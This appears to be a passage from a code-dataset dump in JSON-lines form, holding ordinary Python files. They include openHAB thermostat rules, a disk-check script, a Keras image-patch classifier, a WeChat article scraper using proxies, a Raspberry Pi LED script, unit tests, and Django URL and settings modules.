os.getenv('OPENHAB_CONF')\r\n\r\nsys.path.append(os.path.join(OH_CONF, \"automation/lib/python/personal\"))\r\nfrom thermostat_statemachine import get_state_machine, get_state_machine_list, get_internal_state_machine_state\r\n\r\nlog = logging.getLogger(\"{}.thermostate_mode\".format(LOG_PREFIX))\r\n\r\n\r\ndef set_mode_item(sm, state):\r\n mode_item_name = sm + \"_Mode\"\r\n mode_item = itemRegistry.getItems(mode_item_name)\r\n if mode_item == []:\r\n log.info(\"ModeItem: \" + mode_item_name + \" does not exist\")\r\n else:\r\n events.sendCommand(mode_item_name, state)\r\n\r\n\r\n@rule(\"Thermostat_statemachines_create\",\r\n description=\"initialize the statemachines for thermostats\",\r\n tags=[\"systemstart\", \"thermostats\", \"statemachines\"])\r\n@when(\"System started\")\r\ndef initialize_thermostate_statemachines(event):\r\n \"\"\"setup all statemachines for 
thermostats\"\"\"\r\n\r\n    for oh_item in itemRegistry.getItems():\r\n\r\n        if \"Heizung\" in oh_item.getName():\r\n\r\n            initialize_thermostate_statemachines.log.debug(\r\n                \"handling item: \" + oh_item.getName())\r\n\r\n            state_machine = get_state_machine(\r\n                oh_item.getName(), initialize_thermostate_statemachines.log)\r\n            item_state = oh_item.getState()\r\n\r\n            if unicode(item_state, errors='ignore') == \"NULL\":\r\n                initialize_thermostate_statemachines.log.debug(\r\n                    \"skip handling item: \" + oh_item.getName() + \" state is NULL\")\r\n                continue\r\n\r\n            if \"BoostMode\" in oh_item.getName():\r\n                initialize_thermostate_statemachines.log.info(\r\n                    \"handling BoostMode: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n                state_machine.set_boost(oh_item.getState() == \"ON\")\r\n                state_machine.send(\"tr_boost_change\")\r\n            if \"ConfigPending\" in oh_item.getName():\r\n                initialize_thermostate_statemachines.log.info(\r\n                    \"handling ConfigPending: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n                state_machine.set_config(oh_item.getState() == \"ON\")\r\n                state_machine.send(\"tr_config_change\")\r\n            if \"PartyMode\" in oh_item.getName():\r\n                initialize_thermostate_statemachines.log.info(\r\n                    \"handling PartyMode: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n                state_machine.set_party(oh_item.getState() == \"ON\")\r\n                state_machine.send(\"tr_party_change\")\r\n            if \"SetPointMode\" in oh_item.getName():\r\n                new_mode = state_machine.state_map[str(\r\n                    int(float(str(item_state))))]\r\n                initialize_thermostate_statemachines.log.info(\r\n                    \"handling SetPointMode: \" + oh_item.getName() + \"(\" + new_mode + \")\")\r\n                state_machine.set_mode(new_mode)\r\n                state_machine.send(\"tr_mode_change\")\r\n            if \"WindowState\" in oh_item.getName():\r\n                initialize_thermostate_statemachines.log.info(\r\n                    \"handling WindowState: \" + oh_item.getName() + \"(\" + str(item_state) + \")\")\r\n                state_machine.set_window_open(oh_item.getState() == \"ON\")\r\n                state_machine.send(\"tr_window_change\")\r\n\r\n    for therm_sm in get_state_machine_list().values():\r\n        initialize_thermostate_statemachines.log.info(\r\n            \"StateMachine \" + therm_sm.get_name() + \"(\" + str(id(therm_sm)) +\r\n            \"): is in state \" + therm_sm.get_state_name())\r\n        initialize_thermostate_statemachines.log.debug(\r\n            get_internal_state_machine_state(therm_sm)\r\n        )\r\n        set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n    initialize_thermostate_statemachines.log.info(\"Done\")\r\n\r\n# ####################\r\n# Rules\r\n# ####################\r\n\r\n# Check BoostModes\r\n\r\n\r\n@rule(\"Thermostat_BoostMode_check\",\r\n      description=\"react on changes in BoostMode\",\r\n      tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"boostmode\"])\r\n@when(\"Member of gThermostate_BoostMode changed\")\r\ndef thermostate_boost_mode_changes(event):\r\n    \"\"\"\r\n    send event to Thermostat statemachine if BoostMode changes\r\n    Args:\r\n        event (_type_): any BoostMode item\r\n    \"\"\"\r\n    thermostate_boost_mode_changes.log.info(\r\n        \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n    therm_sm = get_state_machine(\r\n        event.itemName, thermostate_boost_mode_changes.log)\r\n    therm_sm.set_boost(str(event.itemState) == \"ON\")\r\n    therm_sm.send(\"tr_boost_change\")\r\n    set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check ConfigModes\r\n\r\n\r\n@rule(\"Thermostat_ConfigMode_check\",\r\n      description=\"react on changes in ConfigMode\",\r\n      
tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"configmode\"])\r\n@when(\"Member of gThermostate_ConfigsPending changed\")\r\ndef thermostate_config_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if ConfigMode changes\r\n Args:\r\n event (_type_): any ConfigMode item\r\n \"\"\"\r\n thermostate_config_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(\r\n event.itemName, thermostate_config_mode_changes.log)\r\n therm_sm.set_config(str(event.itemState) == \"ON\")\r\n therm_sm.send(\"tr_config_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check Modes\r\n\r\n\r\n@rule(\"Thermostat_Mode_check\",\r\n description=\"react on changes in Mode\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"mode\"])\r\n@when(\"Member of gThermostate_SetPointModes changed\")\r\ndef thermostate_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if Mode changes\r\n Args:\r\n event (_type_): any Mode item\r\n \"\"\"\r\n thermostate_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(event.itemName, thermostate_mode_changes.log)\r\n thermostate_mode_changes.log.info(therm_sm.get_name())\r\n if str(event.itemState) in therm_sm.state_map:\r\n therm_sm.set_mode(therm_sm.state_map[str(event.itemState)])\r\n else:\r\n thermostate_mode_changes.log.info(\r\n \"unknown mode %s value for %s\", event.itemState, event.itemName)\r\n therm_sm.send(\"tr_mode_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check PartyModes\r\n\r\n\r\n@rule(\"Thermostat_PartyMode_check\",\r\n description=\"react on changes in PartyMode\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"partymode\"])\r\n@when(\"Member of gThermostate_PartyModes changed\")\r\ndef thermostate_party_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if PartyMode changes\r\n Args:\r\n event (_type_): any PartyMode item\r\n \"\"\"\r\n thermostate_party_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(\r\n event.itemName, thermostate_party_mode_changes.log)\r\n therm_sm.set_party(str(event.itemState) == \"ON\")\r\n therm_sm.send(\"tr_party_change\")\r\n set_mode_item(therm_sm.get_name(), therm_sm.get_state_name())\r\n\r\n# Check WindowStates\r\n\r\n\r\n@rule(\"Thermostat_WindowState_check\",\r\n description=\"react on changes in WindowState\",\r\n tags=[\"memberchange\", \"thermostats\", \"statemachines\", \"windowmode\"])\r\n@when(\"Member of gThermostate_WindowStates changed\")\r\ndef thermostate_window_mode_changes(event):\r\n \"\"\"\r\n send event to Thermostat statemachine if WindowState changes\r\n Args:\r\n event (_type_): any WindowState item\r\n \"\"\"\r\n thermostate_window_mode_changes.log.info(\r\n \"rule fired because of %s %s --> %s\", event.itemName, event.oldItemState, event.itemState)\r\n\r\n therm_sm = get_state_machine(\r\n event.itemName, thermostate_window_mode_changes.log)\r\n therm_sm.set_window_open(str(event.itemState) == \"ON\")\r\n therm_sm.send(\"tr_window_change\")\r\n set_mode_item(therm_sm.get_name(), 
therm_sm.get_state_name())\r\n","sub_path":"automation/jsr223/python/personal/thermostat_mode.py","file_name":"thermostat_mode.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"605381365","text":"# -*- coding: UTF-8 -*-\n\nfrom lib import main, datalib, maillib, shellbin\n\ndef worker( topic, debug=False ):\n    cmd = \"%s -a -k -i -T|%s '{if(NR != 1)print $6,$9,$10}'\" % \\\n        ( shellbin.df, shellbin.awk )\n    nowTime = main.getTime().now()\n    status, output = main.execCmd( cmd )\n    if status != 0:\n        level = 'ERROR'\n        msg = 'disk check command failed'\n        maillib.mailer( msg + '\n' + output )\n        datalib.logger( topic, msg, level, debug )\n    \n    data = {\n        nowTime : {},\n    }\n    d = data[nowTime]\n    output = output.split('\n')\n    for i in output:\n        i = i.split()\n        if i[-1] == '/dev':\n            continue\n        d['%s(used)'%i[-1]] = i[0]\n        d['%s(inode)'%i[-1]] = i[1]\n\n    datalib.dataWriter( topic, data )\n","sub_path":"script/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"148348961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 22 09:32:50 2020\n\n@author: Miyazaki\n\"\"\"\n\nfrom skimage import data, color, feature\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom tkinter import filedialog\nimport tkinter \nfrom tkinter import messagebox\nimport sys, os, os.path\nfrom tqdm import tqdm\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array, load_img\nimport numpy\nfrom PIL import Image\nimport matplotlib.patches as pat\nimport time \n\ndef rgb_to_gray(src):\n    # obtain individual values\n    b, g, r = src[:,:,0], src[:,:,1], src[:,:,2]\n    # RGB to gray\n    return np.array(0.2989 * r + 0.5870 * g + 0.1140 * b, dtype='float32')\n#################################################\n\n\n#file dialogue\nroot = tkinter.Tk()\nroot.withdraw()\ndir = \"C:/Users/miyas\"\nmessagebox.showinfo('selectfiles', 'select an image')\ntarget_file_path = tkinter.filedialog.askopenfilename(initialdir = dir)\n#messagebox.showinfo('selectfiles', 'select your trained model')\nmodel_file_path = \"C:/Users/Miyazaki/Desktop/private/Deeplearning/models/20200515/test1_model3.h5\"\nmodel=load_model(model_file_path)\n#init setting \nwindow_width = 50\nwindow_height = 50\nfolderpath = os.path.dirname(target_file_path)\nfilelist = os.listdir(folderpath)\nfilelist = [i for i in filelist if os.path.splitext(i)[1] == '.jpg' \\\n            or os.path.splitext(i)[1] == '.png']\nos.chdir(folderpath)\nos.makedirs(\"../{}\".format('label1'), exist_ok = True)\nos.makedirs(\"../{}\".format('label0'), exist_ok = True)\n#file load \n\nt1 = time.time() \n\n\n# the scale-conversion feature below is frozen (unused) for now\ndef sliding_window(img, patch_size =[100, 100], istep =25, jstep=25, scale =1.0):\n    Ni, Nj=[int(scale*s) for s in patch_size]\n    # scale the patch size via a list comprehension\n    for i in range(0, img.shape[0] - Ni, istep):\n        # work out how many sliding-window offsets fit along the rows and assign each to i\n        for j in range(0, img.shape[1] - Nj, jstep):\n            # likewise along the columns\n            patch = img[i:i + Ni, j:j+Nj]\n            # a single patch\n            #if scale != 1:\n                #patch = transform.resize(patch, patch_size)\n            PILpatch = Image.fromarray(numpy.uint8(patch))\n            yield (i, j), PILpatch, patch\n    \nfor k in filelist:\n    test_image = cv2.imread(k)\n    indices, patches, cv2_patches = zip(*sliding_window(test_image))\n    labels = []\n    for i in tqdm(range(len(patches))):\n        img_nad = img_to_array(patches[i])/255\n        #transform to 4D\n        img_nad = img_nad[None, ...]\n        pred = 
model.predict(img_nad)\n label = model.predict_classes(img_nad)\n label = int(label[0][0])\n if label ==1:\n cv2.imwrite('./label1/positive{}.jpg'.format(i),cv2_patches[i])\n else:\n cv2.imwrite('./label0/positive{}.jpg'.format(i),cv2_patches[i])\n labels.append(label)\n labels = np.array(labels)\n\n\nt2 = time.time()\nelapsed_time = t2-t1\nprint(f\"経過時間:{elapsed_time}\")\n\n","sub_path":"Image_analysis/Background_Subtraction/keras_worm_detector_for_mining.py","file_name":"keras_worm_detector_for_mining.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"15677161","text":"# http://chuansong.me/\n# 从传送门获取微信公众号数据\n\nimport pymysql\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom webspider import wechat_article_content_spider\n\n# http://chuansong.me/account/cdfer100?start=0\nbase_url = \"http://chuansong.me\"\npublic_id = \"cdsb86612222\" # 需要爬取的微信公众号\npublic_name = '成都商报'\nhome_url = base_url + \"/account/\" + public_id\n\n\nclass FuckWechat:\n # 构造基本的request\n def request(self, url, proxy_ip):\n proxy = {\n 'http': 'http://%s' % (proxy_ip.strip()) ##设置随机代理ip\n }\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\"}\n\n try:\n content = requests.get(url, headers=headers, proxies=proxy, timeout=10)\n if content.status_code == 200:\n return content\n else:\n wechat_article_content_spider.GetDetail.write_ip_file()\n self.parse_page(url, wechat_article_content_spider.GetDetail.read_ip_file())\n except requests.exceptions.ConnectionError:\n wechat_article_content_spider.GetDetail.write_ip_file()\n self.parse_page(url, wechat_article_content_spider.GetDetail.read_ip_file())\n except requests.exceptions.ReadTimeout:\n wechat_article_content_spider.GetDetail.write_ip_file()\n self.parse_page(url, wechat_article_content_spider.GetDetail.read_ip_file())\n\n def get_max_page(self, url, proxy_ip):\n html = self.request(url, proxy_ip)\n soup = BeautifulSoup(html.text, 'html.parser')\n last_page_index = soup.find_all('a')[-6].get_text() # 获取最后一页的页码\n if str(last_page_index).isdigit():\n print(last_page_index)\n return int(last_page_index)\n else:\n print('没有获取到页码')\n\n def parse_page(self, url, proxy_ip):\n html = self.request(url, proxy_ip)\n if html is not None:\n soup = BeautifulSoup(html.text, 'html.parser')\n div_items = soup.find_all('div', class_='feed_item_question')\n list = []\n for div_item in div_items:\n article_title = div_item.find('a').get_text()\n article_detail_link = base_url + div_item.find('a')['href']\n publish_time = div_item.find('span', class_='timestamp').get_text()\n data = (public_id, public_name, article_title.replace(\"\\n\", \"\"), article_detail_link, publish_time)\n list.append(data)\n # print(list)\n self.insert_db(list)\n\n def insert_db(self, data):\n db = pymysql.connect(host='localhost', port=3306, user='root', passwd='', charset='utf8mb4',\n db='wechat_article_data')\n cursor = db.cursor()\n sql = \"INSERT INTO wechat_chuansong_data(public_id,public_name,article_title,article_detail_link,publish_time) VALUES(%s,%s,%s,%s,%s)\"\n try:\n cursor.executemany(sql, data)\n db.commit()\n print('---插入成功---' + str(cursor.lastrowid))\n except ValueError as e:\n db.rollback()\n print(e)\n finally:\n cursor.close()\n db.close()\n\n def run(self):\n max = self.get_max_page(home_url, wechat_article_content_spider.GetDetail.read_ip_file())\n for page_num in range(max):\n proxy_id = 
wechat_article_content_spider.GetDetail.read_ip_file()\n self.parse_page(home_url + \"?start=\" + str(page_num * 12), proxy_id)\n\n\nFuckWechat = FuckWechat()\nFuckWechat.run()\n","sub_path":"webspider/wechat_web_spider.py","file_name":"wechat_web_spider.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"614507609","text":"import time\nimport os\nimport RPi.GPIO as io\nio.setmode(io.BCM)\n\npir_pin = 18\n#door_pin = 23\nled_pin = 4\nio.setup(pir_pin, io.IN) # activate input\n#io.setup(door_pin, io.IN, pull_up_down=io.PUD_UP) # activate input with PullUp\n\nio.setup(led_pin, io.OUT) \nloopcount = 0\nio.output(led_pin, True)\n\n#while True:\n# if io.input(pir_pin):\n# print(\"PIR ALARM!\")\n#\tio.output(led_pin, True)\n#\tos.system(\"date > /home/pi/motion.log\")\n#\tloopcount = 0 \n# else: \n#\tloopcount = loopcount + 1 \n# io.output(led_pin, False)\n# #if io.input(door_pin):\n# # print(\"DOOR ALARM!\")\n# time.sleep(0.5)\n# if loopcount == 30:\n#\tprint(\"30 sec of slence\")\n","sub_path":"ledon.py","file_name":"ledon.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"469633080","text":"import unittest\nfrom expression import Expression\n\nclass TestPolynomial(unittest.TestCase):\n\tdef test_wrong_input(self):\n\t\texpression = \"6*x*x*x\"\n\t\texc = None\n\t\ttry:\n\t\t\tres = Expression(expression)\n\t\texcept ValueError as error:\n\t\t\texc = error\n\t\tself.assertIsNotNone(exc)\n\n\tdef test_not_string_is_given(self):\n\t\texpression = []\n\t\texc = None\n\t\ttry:\n\t\t\tres = Expression(expression)\n\t\texcept AssertionError as error:\n\t\t\texc = error\n\t\tself.assertIsNotNone(exc)\n\n\tdef test_calculation_when_we_do_not_have_x(self):\n\t\tex = \"62\"\n\t\texpression = Expression(ex)\n\t\texpected = \"0\"\n\t\tself.assertEqual(expected,expression.result)\n\n\tdef test_calculation_when_we_have_no_coef(self):\n\t\texpression1 = Expression(\"x^6\")\n\t\texpression2 = Expression(\"x\")\n\t\tself.assertEqual(expression1.result,\"6*x^5\")\n\t\tself.assertEqual(expression2.result,\"1\")\n\n\tdef test_calculation_when_we_have_coef(self):\n\t\texpression1 = Expression(\"6*x\")\n\t\texpression2 = Expression(\"7*x^2\")\n\t\texpression3 = Expression(\"2*x^0\")\n\t\tself.assertEqual(expression1.result,\"6\")\n\t\tself.assertEqual(expression2.result,\"14*x\")\n\t\tself.assertEqual(expression3.result,\"0\")\n\n\tdef test_with_no_degree(self):\n\t\texpression1 = Expression(\"x\")\n\t\texpression2 = Expression(\"3*x\")\n\t\texpression3 = Expression(\"3x\")\n\t\tself.assertEqual(expression3.result,\"3\")\n\t\tself.assertEqual(expression2.result,\"3\")\n\t\tself.assertEqual(expression1.result,\"1\")\n\n\t\t\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"polynomial/test_expression.py","file_name":"test_expression.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"407275830","text":"#! /usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom django.conf.urls import url\r\nfrom . 
import views\r\n\r\nurlpatterns = [\r\n url(r'^services/$', views.services_page, name='services_page'),\r\n url(r'^price/$', views.price_page, name='price_page'),\r\n url(r'^about/$', views.about_page, name='about_page'),\r\n url(r'^contacts/$', views.contacts_page, name='contacts_page'),\r\n url(r'^', views.mainpage, name='main_page'),\r\n]","sub_path":"baseApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"429862063","text":"import os\n\n\ntry:\n import dpctl\n\n dppy_present = dpctl.has_sycl_platforms() and dpctl.has_gpu_queues()\nexcept:\n dppy_present = False\n\n\ndef _readenv(name, ctor, default):\n \"\"\"Original version from numba\\core\\config.py\n class _EnvReloader():\n ...\n def process_environ():\n def _readenv(): ...\n \"\"\"\n value = os.environ.get(name)\n if value is None:\n return default() if callable(default) else default\n try:\n return ctor(value)\n except Exception:\n warnings.warn(\n \"environ %s defined but failed to parse '%s'\" % (name, value),\n RuntimeWarning,\n )\n return default\n\n\n# Save intermediate files being generated by DPPY\nSAVE_IR_FILES = _readenv(\"NUMBA_DPPY_SAVE_IR_FILES\", int, 0)\n\n# Turn SPIRV-VALIDATION ON/OFF switch\nSPIRV_VAL = _readenv(\"NUMBA_DPPY_SPIRV_VAL\", int, 0)\n","sub_path":"numba-dppy/numba_dppy/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"165817891","text":"#Menubar\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QAction, QMenu\nfrom PyQt5.QtCore import QCoreApplication\n\nclass Exam(QMainWindow):\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.statusBar()#create statusbar\n self.statusBar().showMessage(\"something\")#take instance an showmessage\n\n menu = self.menuBar()#create menubar\n menu_file = menu.addMenu('File')#adding menu, creating group\n menu_edit = menu.addMenu('Edit')\n\n file_exit = QAction('Exit', self) #create instance\n file_exit.setShortcut('Ctrl+Q') #setting hot key\n file_exit.setStatusTip(\"something to quit\")#view Tips\n\n file_exit.triggered.connect(QCoreApplication.instance().quit)#When it's selected\n\n file_new = QMenu('New', self)#make subgroup\n\n new_txt = QAction('text file', self)#make sub menu\n new_py = QAction('python file', self)\n\n file_new.addAction(new_py)#add sub menu\n file_new.addAction(new_txt)\n\n menu_file.addAction(file_exit)\n menu_file.addMenu(file_new)#creat Menu group\n self.resize(450,400)\n self.show()\n\napp = QApplication(sys.argv)\nw = Exam()\nsys.exit(app.exec_())","sub_path":"SeeWhy/test/test_gui_Menubar.py","file_name":"test_gui_Menubar.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"612013132","text":"\"\"\"\nDjango shared settings for the shortimer project.\n\nYou must set a SECRET_KEY environment variable. You will probably want to set\nat least some of the environment variables referenced under Social auth and\nMisc credentials. You probably do not need to override anything else. 
If you\ndo, you should override that in your personal settings file in\n`settings/dev/yourfile.py` and make sure that your DJANGO_SETTINGS_MODULE\npoints to that file.\n\"\"\"\n\nimport os\n\nfrom django.core.exceptions import ImproperlyConfigured\n\n# Build paths inside the project like this: os.path.join(PROJECT_DIR, ...)\nSETTINGS_DIR = os.path.dirname(os.path.abspath(__file__))\nPROJECT_DIR = os.path.join(SETTINGS_DIR, '..')\nLOG_DIR = os.path.join(PROJECT_DIR, \"logs\")\n\ndef get_env_requirement(var_name):\n    \"\"\"\n    Get the environment variable or return exception. Use this for variables\n    that are required for the project to run.\n    \"\"\"\n    try:\n        return os.environ[var_name]\n    except KeyError:\n        error_msg = \"Could not find the environment variable %s\" % var_name\n        raise ImproperlyConfigured(error_msg)\n\ndef get_env_variable(var_name):\n    \"\"\"\n    Get the environment variable or don't. Use only for optional settings.\n    \"\"\"\n    try:\n        return os.environ[var_name]\n    except KeyError:\n        return None\n\n\n###############################################################################\n#\n# Misc yaks\n#\n###############################################################################\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\n# This is insecure and should be overridden in production.py and other servers.\nALLOWED_HOSTS = [\"*\"]\n\nSITE_ID = 1\n\nSECRET_KEY = get_env_requirement('SECRET_KEY')\n\nUSE_THOUSAND_SEPARATOR = True\n\nJOB_FEEDS = [\n    'http://joblist.ala.org/news/',\n    'http://archivesgig.wordpress.com/feed/',\n    'http://feeds.feedburner.com/alljobs',\n    'http://digital-scholarship.org/digitalkoans/category/digital-library-jobs/feed/',\n    'http://www.higheredjobs.com/rss/categoryFeed.cfm?catID=34',\n    'http://www.museumsandtheweb.com/jobs-available-and-wanted/feed/',\n    'http://jobs.educause.edu/jobs?keywords=library&resultsPerPage=12&noStem=false&titlesOnly=false&salary_open=false&showMoreOptions=false&display=rss',\n    'http://careers.archivists.org/jobs?resultsPerPage=12&display=rss',\n    'http://www.libraryjobline.org/rss',\n    'http://pipes.yahoo.com/arljobstorss/c8f6fa1c3aa9c60d39bc01a35e899fa5?_render=rss'\n]\n\nCRISPY_TEMPLATE_PACK = 'bootstrap'\n\n\n###############################################################################\n#\n# Application definition\n#\n###############################################################################\n\nINSTALLED_APPS = (\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.sites',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'django.contrib.admin',\n    'django.contrib.sitemaps',\n    'django.contrib.humanize',\n    'social_auth',\n    'south',\n    'crispy_forms',\n    'shortimer.jobs',\n)\n\nMIDDLEWARE_CLASSES = (\n    'django.middleware.common.CommonMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'pagination.middleware.PaginationMiddleware',\n)\n\nROOT_URLCONF = 'shortimer.urls'\n\n#this might need to be set\n#WSGI_APPLICATION = 'librarycloud.wsgi.application'\n\n\n###############################################################################\n#\n# Databases\n#\n###############################################################################\n\nDATABASES = {\n    'default': {\n        'ENGINE': 
'django.db.backends.sqlite3',\n 'NAME': os.path.join(PROJECT_DIR, 'jobs.db'),\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n\n###############################################################################\n#\n# Internationalization\n#\n###############################################################################\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/Chicago'\nUSE_I18N = True\nUSE_L10N = False\nDATETIME_FORMAT = 'Y-m-d H:i:s T'\n\n# This was unset in a prior version of shortimer. That version of Django\n# defaulted USE_TZ to False; we're setting it here because explicit is\n# better than implicit.\nUSE_TZ = False\n\n\n###############################################################################\n#\n# Static files\n#\n###############################################################################\n\nSTATIC_ROOT = 'staticfiles'\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_DIR, 'static/'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nMEDIA_ROOT = ''\n\nMEDIA_URL = '/media/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\n\n###############################################################################\n#\n# Templates\n#\n###############################################################################\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_DIR, 'templates'),\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.request',\n 'django.core.context_processors.static',\n)\n\n\n###############################################################################\n#\n# Authentication\n#\n###############################################################################\n\nAUTHENTICATION_BACKENDS = (\n 'social_auth.backends.twitter.TwitterBackend',\n 'social_auth.backends.facebook.FacebookBackend',\n 'social_auth.backends.contrib.linkedin.LinkedinBackend',\n 'social_auth.backends.contrib.github.GithubBackend',\n)\n\nLOGIN_URL = '/login/'\nLOGIN_REDIRECT_URL = '/'\nLOGIN_ERROR_URL = '/login-error/'\n\n\n###############################################################################\n#\n# Logging\n#\n###############################################################################\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(levelname)s %(asctime)s %(message)s'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'pop': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'formatter': 'simple',\n 'filename': os.path.join(LOG_DIR, 'pop.log')\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'shortimer.jobs.management.commands.pop': {\n 'handlers': ['pop'],\n 'level': 'DEBUG',\n 'propagate': True,\n }\n 
}\n}\n\n\n###############################################################################\n#\n# Social auth\n#\n###############################################################################\n\nTWITTER_CONSUMER_KEY = get_env_variable('TWITTER_CONSUMER_KEY')\nTWITTER_CONSUMER_SECRET = get_env_variable('TWITTER_CONSUMER_SECRET')\nTWITTER_EXTRA_DATA = [('profile_image_url', 'profile_image_url')]\n\nFACEBOOK_APP_ID = get_env_variable('FACEBOOK_APP_ID')\nFACEBOOK_API_SECRET = get_env_variable('FACEBOOK_API_SECRET')\n\nLINKEDIN_CONSUMER_KEY = get_env_variable('LINKEDIN_CONSUMER_KEY')\nLINKEDIN_CONSUMER_SECRET = get_env_variable('LINKEDIN_CONSUMER_SECRET')\n\nGITHUB_APP_ID = get_env_variable('GITHUB_APP_ID')\nGITHUB_API_SECRET = get_env_variable('GITHUB_API_SECRET')\n\nGOOGLE_CONSUMER_KEY = get_env_variable('GOOGLE_CONSUMER_KEY')\nGOOGLE_CONSUMER_SECRET = get_env_variable('GOOGLE_CONSUMER_SECRET')\nGOOGLE_DISPLAY_NAME = get_env_variable('GOOGLE_DISPLAY_NAME')\nGOOGLE_API_KEY = get_env_requirement('GOOGLE_API_KEY') # for freebase suggest\n\n\n###############################################################################\n#\n# Misc credentials\n#\n###############################################################################\n\n# Protip: don't recycle these passwords.\n\n# Credentials for the code4lib twitter account, to tweet new job postings.\n\nCODE4LIB_TWITTER_OAUTH_CONSUMER_KEY = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_CONSUMER_KEY')\nCODE4LIB_TWITTER_OAUTH_CONSUMER_SECRET = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_CONSUMER_SECRET')\nCODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_KEY = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_KEY')\nCODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_SECRET = \\\n get_env_variable('CODE4LIB_TWITTER_OAUTH_ACCESS_TOKEN_SECRET')\n\n# 